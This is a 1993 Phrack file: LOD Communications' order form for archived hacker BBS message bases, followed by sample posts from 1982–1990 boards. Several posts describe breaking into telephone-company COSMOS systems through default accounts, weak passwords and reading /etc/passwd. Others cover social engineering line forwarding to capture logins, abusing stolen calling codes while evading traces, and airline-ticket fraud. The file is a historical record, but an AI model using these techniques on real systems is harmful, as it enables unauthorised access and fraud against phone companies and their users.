new messages are added, then if you previously purchased the message base, the additional messages will be discounted. Those who pay the Commercial Rate (corporations, government, etc.) will receive updates of the purchased Volume for FREE regardless of how many new messages there are, and LODCOM also pays for the postage and diskette(s). QUESTION: What if I purchase the minimum order now and, when the next Version of the price list is released, I want to get more Message Bases? Do I have to still pay the $20.00 minimum? ANSWER: No. If you are a previous customer, the minimum is cut in half, that is, $10.00. Commercial customers who bought Volume #1 (the current "Complete Set"), are obviously not obligated to purchase the added Message Bases (the next Volume). QUESTION: I would really like to get a feel for what one or two of the boards were like before I order them. Can I get more info? ANSWER: Yes. A Sample of Actual Messages is available by performing the following, so long as you have TELNET access to the Internet: Telnet to: 198.67.3.2 [IP Address for PHANTOM.COM] Type: mindvox [To enter the Mindvox system] login as: guest [To look around] At prompt: finger lodcom [To see our Sample Messages File] If you do not have TELNET access to the Internet, AND your host will NOT "bounce" a 50K file, Lodcom will send you the Sample Messages File if you specifically request it. The Price List: --------------- LOD Communications (c) 1993: Price List of Hack/Phreak BBS Message Bases ---------------------------------------------------------------------------- BBS NAME A/C SYSOP(S) # MSGS DATES KBYTES PRICE ---------------------------------------------------------------------------- Alliance BBS 618 Phantom Phreaker 113 2/09/86 - 215 $ 3.00 B Doom Prophet G,P 6/30/86 Black Ice Private 703 The Highwayman 880 12/1/88 - 580 $ 7.00 B P,U 5/13/89 Broadway Show/ 718 Broadway Hacker 180 9/29/85 - 99 $ 3.00 B Radio Station BBS 12/27/85 CIA BBS 201 CIA Director 30 5/02/84 - 30 $ 1.00 6/08/84 C.O.P.S. 305 Mr. Byte-Zap 227 11/5/83 - 196 $ 4.00 B The Mechanic G,R,U 7/16/84 Face To Face 713 Montressor 572 11/26/90 - 400 $ 2.00 B Doc Holiday * 12/26/90 Farmers Of Doom 303 Mark Tabas 41 2/20/85 - 124 $ 2.00 B G 3/01/85 Forgotten Realm 618 Crimson Death 166 3/08/88 - 163 $ 3.00 B 4/24/88 Legion Of Doom! 305 Lex Luthor 194 3/19/84 - 283 $ 6.00 B Paul Muad'Dib * G,P,U 11/24/84 Metal Shop Private 314 Taran King 520 4/03/86 - 380 $ 4.00 BD Knight Lightning P,R,U 5/06/87 OSUNY 914 Tom Tone 375 7/9/82 - 368 $ 8.00 B Milo Phonbil * G,U 4/9/83 Phoenix Project 512 The Mentor 1118 7/13/88 - 590 $ 4.00 B Erik Bloodaxe * G,R 2/07/90 Plover-NET 516 Quasi Moto 346 1/14/84 - 311 $ 5.00 B Lex Luthor * G 5/04/84 Safehouse 612 Apple Bandit 269 9/15/83 - 251 $ 4.00 B G,U 5/17/84 Sherwood Forest I 212 Magnetic Surfer 92 5/01/84 - 85 $ 2.00 B P,U 5/30/84 Sherwood Forest ][ 914 Creative Cracker 100 4/06/84 - 239 $ 3.00 B Bioc Agent 003 * G 7/02/84 Split Infinity 408 Blue Adept 52 12/21/83 - 36 $ 1.00 B 1/21/84 Twilight Phone ??? System Lord 17 9/21/82 - 24 $ 1.00 1/09/83 Twilight Zone/ 203 The Marauder 108 2/06/85 - 186 $ 3.00 B Septic Tank Safe Cracker * G,U 7/24/86 WOPR 617 Terminal Man 307 5/15/84 - 266 $ 6.00 B The Minute Man * G,U 1/12/85 _____________________________________________________________________________ NOTES: In SYSOP(S) column, * indicates remote sysop. In #msgs column, P indicates that the BBS was Private, R indicates BBS was public but restricted access sub-board(s) are included, G indicates that SOME (or maybe all) of the G-files written by the sysop and/or files that were available on the BBS are included, U indicates that a BBS Userlist (typically undated) is included. DATES column shows the starting and ending dates for which messages were buffered (and therefore available) although there may be some gaps in the chronological order. KBYTES column shows size of complete file containing messages, g-files, userlist, etc. COST column indicates current cost of message base in U.S. Dollars, "B" indicates that a "BBS Pro-Phile" was written and is included, "D" indicates that 100% of all orders for that BBS (Metal Shop Private) will be donated to help pay for Craig Neidorf's (Knight Lightning) Legal Defense bills. LODCOM is currently organizing and splicing messages from over 30 more H/P BBSes [shown below] and, as the files are completed and/or as additional messages are procured for the above systems, updates of this listing will be released. Next release is expected some time in JUNE of 1993: Modem Over Manhattan (MOM), 8BBS (213), Mines of Moria (713), Pirates Cove (516) sysop: BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak Klass 2600 (806) sysop: The Egyptian Lover, Blottoland (216) sysop: King Blotto, Osuny 2 (a.k.a. The Crystal Palace) (914), The Hearing Aid, Split Infinity (408), (303) sysop: The ShadowMaster, ShadowSpawn (219) sysop: Psychic Warlord, IROC (817) sysop: The Silver Sabre, FreeWorld II (301) sysop: Major Havoc, Planet Earth, Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach Underground (806) sysop: Swamp Ratte, Stronghold East Elite (516) sysop: Slave Driver, Pure Nihilism, 5th Amendment (713) sysop: Micron, Newsweek Elite (617) sysop: Micro Man, Lunatic Labs (415) sysop: The Mad Alchemist, Laser Beam (314), Hackers Den (718) sysop: Red Knight, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace, Digital Logic's Data Center (305) sysop: Digital Logic, Asgard (201), The KGB, Planet Earth (714), PBS (702), Lost City of Atlantis sysop: The Lineman, and more. Hacking/Phreaking Tutorials a.k.a. "G-Philes": ---------------------------------------------- Along with the above H/P BBS Message Bases, LODCOM has collected many of the old "philes" that were written and disseminated over the years. A list of all of them would take up too much space here, however, we can tell you that the majority are NOT files that were originally written for electronic newsletters such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the LOD/H Technical Journal). Those files/newsletters are readily available from other sources. This hodgepodge of files includes files from Bioc Agent 003, Legion of Doom members, and many others that somehow fell out of widespread circulation. A Table of Contents of the collection is included but the tutorials are all grouped together in four large files of approximately 250K each. This collection will have additions with each update of this file. See the order form for the price (price will go up as more files are added). The Order Form: --------------- - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - LOD Communications H/P BBS Message Base ORDER FORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PERSONAL RATE: Due to the economics involved in diskettes, disk mailing containers, snail mail costs, and time to fill orders, a MINIMUM ORDER of $20.00 is required for all personal requests. If all 20 message bases are ordered (containing 5700+ messages), the cost is discounted to $39.00; if you order $20.00 worth (the minimum) or more, you get $5.00 worth in addition as a discount. That is, pay for $20.00 and get $25.00 worth of message bases. COMMERCIAL RATE: Corporations, Universities, Libraries, and Government Agencies must order the complete set (Volume #1) and pay a higher rate. For Price Listing Version #1 Released 5/15/93 (20 boards total), the price is $99.00 (note that new messages that surface for any BBS purchased will be sent completely FREE of ANY additional charge). H/P BBS Names: ____________________________________________________________ [Write: COMPLETE ____________________________________________________________ SET if you want all messages] ____________________________________________________________ "G-Phile" Collection Version #1 (Optional): $____________ ($10.00 Personal) ($25.00 Commercial) Disk Format/Type of Computer: _____________________________________ (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density) File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________ (ASCII [Non-Compressed] add $2.00 to order) Texas Residents add 8% Sales Tax. If outside North America please add $5.00 for Shipping & Handling. Total Amount (In U.S. Dollars): $ ___________ Payment Method: Check or Money Order please. Absolutely NO Credit Cards, even if it's yours :-) By purchasing these works, the Purchaser agrees to abide by all applicable U.S. Copyright Laws to not distribute or reproduce, electronically or otherwise, in part or in whole, any part of the Work(s) without express written permission from LOD Communications. Send To: Name: _____________________________________ Organization: _____________________________________ (If applicable) Street: _____________________________________ City/State/Zip: _____________________________________ Country: _____________________________________ E-mail address: _____________________________________ (If applicable) PRIVACY NOTICE: The information provided to LOD Communications is used for sending orders and periodic updates to the H/P BBS Message Base Price List. It will NOT be given or sold to any other party. Period. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - Remit To: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 Lodcom can also be contacted via E-mail: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 _____________________________________________________________________________ End Order File V.1 LOD Communications: Leaders in Engineering, Social and Otherwise ;) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ==Phrack Magazine== Volume Four, Issue Forty-Three, File 19 of 27 Lodcom Sample Messages Set #1, 4/20/93 In order to provide a better feeling for the content of what the LOD Communications Underground Hack/Phreak BBS Message Base Archives contain, 31 messages were selected from the overall collection of posts for 5 Boards. Note that the samples contained herein are fairly typical and are but a very small fraction of the 5000+ messages from over 50 systems that LODCOM currently possesses. Additional BBS's and messages are being added constantly. Consult the Price Listing [First Version due to be released in Late April 1993 and periodic additions thereafter] for an up-to-date catalog of our holdings and costs (minimal). The selection of messages in Set #1 are from the following Systems: H/P BBS Name A/C Sysop(s) Circa ----------------------------------------------------------------------------- OSUNY 914 Tom Tone & Milo Phonbil 1982/83 WOPR 617 Terminal Man & The Minute Man 1984/85 Phoenix Project 512 The Mentor & Erik Bloodaxe 1988/89/90 The Twilight Zone 203 The Marauder & SafeCracker 1985/86 Black Ice Private 703 The HighwayMan & The Mentor 1988/89 _____________________________________________________________________________ H/P BBS Message Bases to be available in the near future (in addition to the above five) are: 8BBS (213) Circa 1980/81, Modem Over Manhattan (MOM), Twilight Phone (1982), Legion of Doom! (305) sysop: Lex Luthor, Plover-NET (516) sysop: Quasi Moto, Sherwood Forest II (914) co-sysop: Bioc Agent 003, Alliance BBS (618) sysop: Phantom Phreaker, Catch-22 (617) sysop: Silver Spy, Blottoland (216) sysop: King Blotto, Osuny 2 (aka The Crystal Palace) (914), Mines of Moria (713), Pirates Cove (516) sysop: BlackBeard, The Hearing Aid, Split Infinity (408), Farmers of Doom! (303) sysop: Mark Tabas, Shadowland (303) sysop: The ShadowMaster, Metal Shop Private (314) sysops: Taran King and Knight Lightning, ShadowSpawn (219) sysop: Psychic Warlord, IROC, FreeWorld II (301), Planet Earth (714), The C.O.P.S. (305), Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217) sysop: Jedi Warrior, Demon Roach Underground, Stronghold East Elite (516) cosysop: Slave Driver, Pure Nihilism, 5th Amendment (713), Newsweek Elite (617), Phreak Klass 2600 (806), Lunatic Labs (415), Laser Beam (314), Hackers Den, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca Bandit, The Armoury (201) sysop: The Mace, Digital Logic (305), Asgard (201), The CIA bbs, The KGB bbs, Face to Face (1990), Broadway Show (718) Sysop: Broadway Hacker, The Safehouse (612) circa 1983/4, Lost City of Atlantis (215), The Private Sector (2600 sponsor BBS), and more. This message constitutes explicit Permission by LOD Communications to disseminate this File containing 31 actual messages from our Copyrighted (c) 1993 collection of H/P BBS Message Bases so long as the contents are not modified. No part of this File may be published in print without explicit permission by Lodcom. Lodcom Sample H/P BBS Messages: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *** {OSUNY (914) Sysop(s): Tom Tone and Milo Phonbil (both wrote for TAP)} *** *** {Osuny is perhaps the most legendary Phreak Board of all time} *** Msg.:118 Date:10/5/82 From:MILO PHONBIL To:ALL About:STANFORD STUFF Greetings, Stanford phreaks! It seems that those "strange" numbers are really ones that will appear if another person is signed on to the same id. (Like AA.TEG AA.TEG#2 AA.TEG#3 and so on .) Also, while there is no MAIL facility available to "GUEST" accounts, there is a way to send a one-liner to someone els e. The command format is: TO gg.uuu msg Where gg.uuu is the person's id, and the msg is of course, the message. Also, their SPIRES database is quite interesting! Type CALL SPIRES, then SHOW SUBFILES. Then you must SELECT a subfile. For a complete tu torial, try: TUTORIAL MASTERLIST SPIRES is ended by typing EXIT at the -> prompt. Later, MILO PHONBIL Msg. :180 About :MAINFRAMES >From :DATA BANDIT To :ALL PHREAKS Date :2/23/83 00:00 OK PHREAKS....YOU NEED HELP ON TSO FORMATS,SPF FORMATS,GDDM FORMATS? THIS IS THE GUY TO ASK....I'M DAMN GOOD AT IT...I WORK AS AN OPERATOR ON SUCH SYSTEMS AND KNOW THESE BABIES LIKE I KNOW MY OWN FACE....SO IF YOU NEED HELP...JUST DROP ME A LINE HERE OR ON MY BOARD....303-xxx-3015.... 24 HRS.....I CAN SHOW YOU HOW TO SET UP A PROGRAM ONCE ON IT TO DUMP ALL SYSTEM PASSWORDS AND ALL DATASET PASSWORDS...ETC...SET UP YOURT OWN USER ID...THE WHOLE 9 YARDS... I HAVE MY COMPANY BY THE F*CKING BALLS! SO I CAN TEACH YOU TOO.... JUST ASK ME..... THE ONE AND ONLY DATA BANDIT ][][ ][][][ ON A MAINFRAME NEAR YOU! ---------------\-/----------------- ? MEMBER P.H.A. Msg. :396 About :PHREAK BBS ON THE SOURCE!!! >From :MAXWELL WILKE To :ALL Date :3/25/83 Well, believe it or not, there is alread y two small phreak BBS's on The Source!!! They have traded some minor info, including some Sprint codes, and other s uch folly. But the thing is, it's there, has been there since october '82, and The Source knows about it, and they don't care! the BBS's are on the Source's PARTIcipat e, which, admitedely, is a very large, powerful "thing." In a ddition to the two on there now, I took the liberty to create my own, entitled the "P-MENU.SAV GROUP". It is Conferenc e # 83.3257 . Any CompuServe conference members out th ere interested in moving over to PARTIcipate on The Source , let me know. If you do not have instructions on it, I 'll mail 'em to you if you give me your address. I'll see w hat I can do about getting some more Source accounts. A fr iend of mine listed 'em all! later, MW P.S. To all fans of my modifications to The Source: Sorry, the good 'ole boys at STC p icked up on what i did to them (Snicker... haw.. ha w) and they cor- rected my modifications. i put 'e m back, and they fixed 'em again, etc, etc, until t hey finally looked up in their PR1MENET REFERENCE MAN UAL and figured out how to protect their accounts! Oh well... Msg. :476 About :BAD NEWS >From :THE HACKER To :ALL Date :4/8/83 BAD NEWS SPRINT IS AT IT AGAIN THEY JUST CAUGHT SOMEONE LAST NIGHT NOW THEY ARE GOING FOR A SECOND KILL THEY ARE GOING AFTER ZERO PAGE THEY HAVE BEEN CALLING AROUND ABOUT SO IF ANYONE OUT THERE KNOWS HIM TELL HIM THAT THEY ARE CALLING AROUND NOW THAT SPRINT AND MCI ARE OUT TO GET ALL OF THE PHREAKS DOES ANYONE HAVE ANY GOOD SERVICES THAT ARE SAFE I AM USING ITT HOW SAFE IS THAT??? PLEASE RESPOND BACK SOMEBODY! THE HACKER [*]THE INNER CIRCLE[*] =-=-=-=-=-=-=-=- Msg. :519 About :SPRINT/MCI/OTHER BUGGERS >From :ROGER OLSON To :ALL Date :4/17/83 I highly recommend the proceedure mentio ned here earlier for staying OUT OF TROUBLE with "the competi tion". Look for your own passwords. Don't use the ones posted on BBS's except maybe once, to "get a feel" of how the particu lar switch works. If possible, test the codes between 8 - 11 AM to detirmine if they are business codes or not. When possible , use a local loop to call into/out of to the switch you are u sing. This simply adds more frustration in the event anyone is tracing. When possible, STAY AWAY completely from these OCC's, o pting instead to use the Wats lines from large companies, via the ir remote call in ports. You always want to stay away from system s that individually account for each call, as MCI/Sprint do. WATS lines, on the other hand, especially in older exchange s, do not record every number called - just the total time the line was in use, in hours per month. In either case....have your phun now!! Cause after the Final Judgement and Settlement is implemented next year, you will place <> long distan ce calls by merely dialing the number desired, and entering a two digit "choice of carrier" code (for ATT, MCI, Sprint, Allnet, etc) and your local central office will use ANI to sup ervise your call! The outfits like MCI will discontinue dealin g with the public as such, and will only deal who in turn will act like billing/collection agents for MCI, etc. Watch and see! The times are changing! N o more phucking around! Msg.: 211 Date: 10/17/82 From: ROBERT ALLEN To: ALL About: WHITE HOUSE IF ANY OF YOU ARE WONDERING, 800-424-9xxx IS WHAT IS KNOWN AS THE WHITE HOUSE SIGNAL (SWITCH BOARD), AND IT IS RELATIVELY NASTY/FUN, IF ONE KNOWS ALL OF THE SILLY CODEWORDS TO USE.. A FRIEND AND 8 OTHER PHREAKS GOT TRICKY DICK OUT OF BED AT 2:30 AM, BY ASKING FOR "OLYMPUS". I HEAR THERE ARE TAPES OF THE CALL FLOATING AROUND... 800-424-9xxx IS A WH. HOUSE PRESS RECORD ING,THAT CAN BE QUITE FUN, IF YOU LIKE RON'S SPEECHES EARLY... DIAL ANYWHERE, BUT DIAL WITH CARE --BOB-- Msg. :111 About :***WARNING!!!*** >From :JIMMY HOFFA To :***PHELLOW-PHREAKERS*** Date :2/19/83 00:00 "FOR ALL YOU *PHELLOW-PHREAKERS* OUT THERE...... there seems to be some "negativeness" out there from a few select peo`le!. WELL, For one thing "THEY" must realize A "*PHREAKER*" IS *NEVER* "*NEGATIVE*" (TAKE NOTE!!. RODGER-OLSON!!).. We ARE A SELECT BREED WHO HAVE BEEN BLEd WITH A REAL UNSATISFYING "THIRST" FOR.. "@KNOWLEDGE*" and Willing to share with "PHELLOW-PHREAKERS". WE CAN DO ANYTHING *MA* CAN DO, ONLY WE CAN DO IT BETTER!!!!! WHO NEEDS "PESSIMISM" ANYWAY???? DID PESSIMISTs HELP BUILD OUR COUNTRY, OUR COMPUTERS, OUR WORLD AROUND US??? NO!!! POSITIVE THINKERS DID, THAT'S WHO!!! PEOPLE WHO HAVE A NEVER-ENDING THIRST FOR KNOWLEDGE, CHALLENGE, AND FOUND NEW IN-ROADS TO HELP BETTER OURSELVES!!! THESE ARE WHAT "I" CALL THE "*REAL*" "PHREAKERS"!!! HOW ABOUT YOU!!! WE CAN TURN NEGATIVES TO POSITIVES EASIER THAN MOST CAN BRUSH THEIR TEETH! WE DON'T NEED NEGATIVES BECAUSE THERE'S ALREAXDY TOO MANY OUT THERE! WHAT WE NEED IS MORE PEOPLE WITH A POSITIVE-MENTAL-ATTITUDE THAT CAN HELP FURTHER OUR QUEST FOR KNOWLEDGE GAINING A SATISFACTION UNBEKNWNST to "NEGATIVE"-"PESIMISTIC" PEOPLE! HAD TO SAY IT AND I DON'T REGRET IT! THIS WAS A>>>>>> ****PUBLIC************ ****SERVICE************ ***ANNOUNCEMENT***************** _____________________________________________________________________________ *** {WOPR (617) SYSOP: Terminal Man. WOPR was a private phreak board and} *** *** {was considered one of the best H/P systems of the time. The} *** *** {following Messages are from 1984 unless stated otherwise} *** Message #33: QUORUM Msg left by: KING BLOTTO Date posted: TUE MAY 29 3:13:14 PM {1984} TO ALL MY SUBJECTS: THIS TOPIC IS ABOUT CONFERENCES. AS MANY OF YOU KNOW, I DON'T CONFERENCE ANYMORE SINCE INFOWORLD PUT OUT AN ARTICLE ON IT ON MARCH 26. THE REASON BEING: THERE ARE N-O SAFE EXCHANGES BEING USED TODAY. EVERYONE SAYS; "BUT THIS IS CHICAGO", "THIS IS A DALLAS EXCHANGE", "THEY CAN'T TRACE CONFEREN- CES!". THE LAST ONE IS MY FAVORITE. THE SYSTEM USED BY ALMOST EVERYONE TODAY IS ALLIANCE TELECONFERENCE. THIS IS NOT BELL OPERATED. QUORUM IS THE BELL CONF. SYSTEM. AND IT'S WORSE THAN ALLIANCE. NEWS HAS IT, THAT ALLIANCE TELECON- FERENCE MIGHT BE GOING UNDER NOW. BUT THEY HAVE STARTED TAKING PEOPLE WITH THEM. ( 5 TO DATE, AS I KNOW) ALLIANCE IS SUPER-PISSED, WELL, WOULDN'T YOU BE? AND ESPECIALLY AFTER EVERY LITTLE 15YR OLD LEARNS HOW TO START ONE UP, HE'LL BE JUST GETTING THEM MORE PISSED OFF. THE ABUSE HAS GROWN TO A MAXIMUM. I AM TRYING TO FIND OUT ALL I CAN ON QUORUM AT WORK. I'LL POST THE INFO AS IT COMES IN. MAJESTICALLY, KING BLOTTO P.S.- READ THE 3/26/84 INFOWORLD! <1-48 LAST=33 E=mail Q=Quit T=Titles> --------------------------------- 69> COSMOS & UNIX --------------------------------- Msg left by: BIOC AGENT 003 Date posted: MON AUG 6 11:18:23 AM COSMOS is basically a modified UNIX sys tem. When a non-priviledged COSMOS user logs on, a program usually called /BIN/PERMIT is run. This tells the system which COSMOS commands the user i s allowed to use. On the other hand, when a priviledged u ser logs in (ie, root, sys, bin, or preop), he is put into the normal UNIX shell (SH) where he can utilize UNIX commands such as: who & cat /etc/ passwd (which will printout the password file). These users can also t ype CHDIR /USR/COSMOS and use ANY of the COSMOS commands since COSMOS is rea lly a sub directory in a UNIX system. They also have a bad (good?) habit of l eaving administrative notices and files (such as the decrypted passwords) layin g around in different directories of the system. In fact, one system down i n Washington, DC has a BIN account with no password (!) until some ASSHOLE decided to change the message of the day"I broke in, ha, ha --Joe Smuck"!!! If you can't get into one of the privil edged accounts then you might as well try for a regular COSMOS account. The typical setup is two letters followed by 2 numbers. Here are a few common on es: TRxx (TRaining -- eg, TR01, TR02, etc.) LSxx(Lac Staff) LA (Line Assignement) FMxx (Frame Manager) NMxx (NAC Manager) RSxx (Repair Service) LMxx (LMOS debug) etc... You best bet would be too go for one of the managers accounts such as NM01. There is also usually a user-name of CO SMOS on the system. The passwords are usually pathetic. Tr y things such as: COSMOS, FRAME, TELCO, etc.) Also try simple words such as: CAT, BAT, RAT, etc. You'll have to guess at the Wire Center , though (WC). It will always b 2 letters. Excelsior, --------------------------------- 1-79 LAST=69 [E]mail [A]bort [T]itles : --------------------------------- 78> Intro To C Search --------------------------------- Msg left by: LORD DIGITAL Date posted: FRI AUG 17 6:20:13 AM {1984} Ok what the program "C PW Scanner", or "The C Search" does is fairly simple. It reads through the main passw ord file searching for a match between A person's name and password and compar es the two. If they match, or if a person's pw is simply his name spelle d backwards. it will write the pw's into a file name of your choice. T his should net you several paswords for every scan at least. The percentage of stupid people on any given system is usually quite high. The entir e search should take about 5 mins. Obviously it can't do too much consider ing everything is crypted... The entire program is internal, and ass umes you have at least one accnt. allready present on the system in quest ion. Instructions :> Pretty simple, all you do is: Uplo ad the text file, use the CC (Compile C) utility, which will give you th e "a.out" (assembly out), now just rename the file (mv) to whatever y ou wish to call it... If anyone wants to trade various C prog rams (trojan horses (not that kind), programs that search for ports with out dial capabilty, etc...) leave e-mail later- .../\^ lord digital ^/\... ------------ -Spectral -- Phorce- --------------------------------- 1-90 LAST=78 [E]mail [A]bort [T]itles : --------------------------------- 83> the old fashioned way... --------------------------------- Msg left by: BIG BROTHER Date posted: FRI AUG 17 10:36:45 PM It might be just as easy when hacking idiot's passwords (User Name, same again; first name, same again; etc.) to do it the old-fashioned way--by hand. Hey, in half an hour I found 15 account s on my 'private' 617 VAX VMS 3.6. Some of them are even partially privili ged. Another thing, always try default pas swords. If the system lets priv'gd users log in thought dial-in lines and the default psswds are still there, you've struck gold. As the wise man sa y, "Keep it to yourself." I once the phone number to a Ztel Prime system (linked to Primenet which eventually links to milnet) with my operator accou nt (User:OPERATOR, no password--default) to a few people. They abused the acco unt(created 10 or 15 other accts for themselves) and it died within days.... --------------------------------- 1-90 LAST=83 [E]mail [A]bort [T]itles : --------------------------------- 85> Pissed As SHIT! --------------------------------- Msg left by: SHARP RAZOR Date posted: SAT AUG 18 4:09:16 AM That is right! i finally have the time and sit down and work with my Wash. DC BIN and PREOP accounts, and 'lo and behold...i call up (i hadn't called for about 5 days) and the #'s were changed. ...not 1..but all 4 dial-ups!! Talk about an abused system! Some of yo u may not know it, but someone logged on and left a cute logon bulletin to all the AT&T bus. people, etc...that went sort of like 'haha, Kilroy wuz here!'...(real cute and intelligent, huh??)..besides that...there were times when I would call at 2AM on a weekday, and see 15-20 people on-line... ...and all on the same account!!! (since the # is changed, I can say it WAS the MF01 act. they were using) Let this be a lesson NOT to go around POSTING COSMOS dial-ups on anything besides a very private BBS,and especial ly not the pw's!...I KNOW that the lower level accounts were given away.. ..but I hope at least the sysop ones weren't..in any case this really shows me not to be so liberal when I hand out COSMOS pw's again. ..Later.. ..Sharp Razor>> The Legion of Doom! (dont worry, I am just a bit po'ed now, but I MAY get over it!!) --------------------------------- 1-90 LAST=85 [E]mail [A]bort [T]itles : Message #87: MORE ESS Msg left by: PAUL MUAD'DIB Date posted: TUE JUN 19 2:59:05 PM I've got many switch and frame #'s to trade, and here's a fun way to get pw's or destroy bbs's- call the switch and do what I said in msg 78 asking for call forwarding on an anonymous # (NOT your local tym- or tele- nets, they DO know them to be special dials)..when he puts it in, call the "frame" #, and say "Hiya, this is Bob Lineman, could you run into the MDF, and try to activate the call forwarding on NNX-XXXX? send it to NNX-XXXF, please, I need to check it out from both ends..." then, hook your computer up to the payphone that NNX-XXXF is, and set up a simulator for the login to that system. When you have it in your pocket, call the frame back and say "Hi, me again, would you just disengage the forwarding on that # for me? I've got the problem, but I need it recieving calls to fix it.." then you can re-hack it later if you want by just calling the frame again in a different shift.. later, Paul Muad'Dib Legion of Doom 1-90 Last=87 E=Mail Q=Quit T=Titles - Message #38: BOSTON COSMOS Msg left by: DOCTOR WHO Date posted: WED MAY 30 10:16:55 PM OK HERE IS A FRESH COSMOS DIALUP..SORRY NO PASSWORD...GO TRASHING BOSTONIANS! 617-338-5xxx SPEAKING OF COSMOS, I WENT TRASHING TOD AY AND GOT A COSMOS PASSWORD. IT SEEMS TO BE A HIGH ACCESS ONE, THEY BROKE IN ON THE GUY USING IT TO DO MAINTENANCE. THE NAME IS FF01. NOW ALL I NEED IS THE DIALUP. I CAN'T SCAN WITH MY MODEM. IF ANYONE WANTS TO DO A LONG-DISTANCE SCAN OF 413, I WILL GIVE YOU THE EXCHANGES T O HACK, AND THE PASSWORD. PLEZE! OH, IF THERE ARE ANY PHREAKS IN THE 413 NPA READING THIS, PLEASE REPLY..ITS LONELY OUT HERE! CONFERENCES: TOO BAD IF A COMPANY GOES OUT OF BUSINESS BECAU SE OF PHREAKS...ONE LONG-DISTANCE COM PANY WHO IS BUGGING ME SAYS THAT PHREAK ING IS FORCING THEM OUT OF THE BUSINESS THAT IS BULLSHIT. DON'T BELIEVE IT. THE PHONE CO.'S MAKE SO MUCH PROFIT ITS PITIFUL. IF IT WASN'T FOR PHREAKS WE WOULD STILL BE STUCK WITH SXS. SO WE HAVE CREATED MANY JOBS..IN AT+T, GTE, I TT...AND IN THE FBI. SO FEEL GOOD..YOU' VE HELPED THE ECONOMY! I HEARD THAT MCI TAKES A BIG TAX LOSS ON STOLEN SERVICES . MUCHO BUCKS SAVED! THATS ALSO (PROBAB LY) THE REASON THE METROPHONE DOESN'T TR Y HARD TO CATCH PHREAKS. YOU KNOW IF THERES ONE THING I CAN'T STAND ITS POLITICS AMONG PHREAKS..ONE PERSON TRYING TO MAKE OTHERS L1 %'AD AND SAY" I RULE!" YOU KNOW WHAT I MEAN? YOU PEOPLE WHO I'ME TALKING ABOUT: NOW THAT YOU'RE HERE UNDER DIFFERENT NAMES, TRY TO BEHAVE!..'NUFF SAID THE T.H.A. (TIMELORDS HOLY ALLIANCE) IS THE GROUP THAT REALLY RULES..BECAUSE WE DON'T HAVE ANY RULES...NO INITIATION.. NO NOTHING...AND YOU NEVER HEAR ANYBODY BADMOUTHING US, DO YOU? IS THERE A GOOD WAY TO BULLSHIT THE FONE CO. FOR THE COSMOS DIALUP? BYE.... -----------=?> DOCTOR WHO --------------------------------- MESSAGE #81: HACK-A-TRIP --------------------------------- Msg left by: BROADWAY HACKER Date posted: TUE JUL 24 8:24:02 PM As you have probably seen on some other good boards, I am ex- tending an offer to anyone who wants to come to New York for free. Hacking airline tickets isn't as hard as you think. If your interested, maybe to go to a TAP m eeting or something, leave me EMAIL. It is relatively easy, but one screwup can ruin you. There are others who may have some idea how this is done, but have not actually done it. Leave me EMAIL if your interest- ed. You must be a minor, however, and y ou must leave me a VALID phone number in feedback since there ar e security measures in- volved since it is grand fraud. *** Broadway Hacker *** (-+-)(Chaos)(+-+) Hack-a-trip --------------------------------- MESSAGE #63: ARGGGH! --------------------------------- Msg left by: KARL MARX Date posted: SAT JUL 21 4:14:43 PM Ahem, I don't know if I am getting moral or something, but things are getting pretty, well, strange. First off: unix is pretty easy to crash if you want to--but why would you want to? Obviously, very few people know "everything" about Unix, and I would like one reason that destroying a system would be better than learning to use it's "special" features. If you want to get your face on Newsweek, go ahead, but otherwise, don't start destroying stuff just for the sake of vandalism! Instead of being a vandal, do somthing Robin Hood-ish, like nice the parent process of the batch runner to -20 or somthing. Or give everyone full privilige to / or make them all user 1. Otherwise, as for metro tracing, that's kinda hard to swallow. Would whoever's friend's sister care to elaborate on that one? I don't know if anyone cares, but I had a chance to take a look at those "goldphones" and Geez!!! There were codes written all over it! I don't understand some people very well. That is simply stupidity. There is really nothing "new and exciting" in phreaking anymore... most of what you hear is bullshit from some twelve-year- old that just learned how to use metro last week. There is simply no "new" anything! Eventually there will be, but until then these "phreak" boards will simply be "how to phreak"--tutorials instead of journals. Drat! :::::::::::::::::::::Karl Marx LOD --------------------------------- You have been on over your time limit. Use the 'O' option to log off. ____ Logout Job ??, TTY ??, On 21-7-84 For 34 Minutes _____________________________________________________________________________ *** {Samples from the Phoenix Project BBS (512), Sysop: The Mentor} *** *** {As many are aware, the Phoenix Project was one of the intended} *** *** {targets in the Hacker Crackdown of 1990 and was erroneously} *** *** {affiliated to Steve Jackson Games' Illuminati BBS} *** *** {Other Networks Sub-Board} *** 8/60: Autonet... Name: Erik Bloodaxe #2 Date: Thu Jan 11 13:18:39 1990 It wouldn't be such a great idea to scan Autonet through the Telenet gateway. Autonet raised a holy shit-fit when Urvile was doing it about a year ago, and sent Telenet Security all kinds of nasty mail bitching for them to stop whoever in 404 was connecting to their system. Telenet blew them off, but if it started again, Telenet might just have to listen to their whining and crack down. I suggest you (or whoever is planning on this) do your scanning through a main dialup. It will be slower, but probably safer in the long run. ->ME 46/60: pac*it Name: Corrupt #114 Date: Thu Feb 01 06:59:10 1990 pac*it plus calls 03110..germany and spain..I didn't think it called DPAC. usefulfor scanning spain..but at this point......hmm I'd be scared of what MCI i would do then GM... anyone up on Kinneynet?hehehehehe I'll post the dialup later but u need a NUI for it :-(( Develnet? I thought the Develnet was just x.25 server software! I've seen several Develnet pads and I had gotinto thesystems it connected to and they weren't MEAN related...maybe I'm 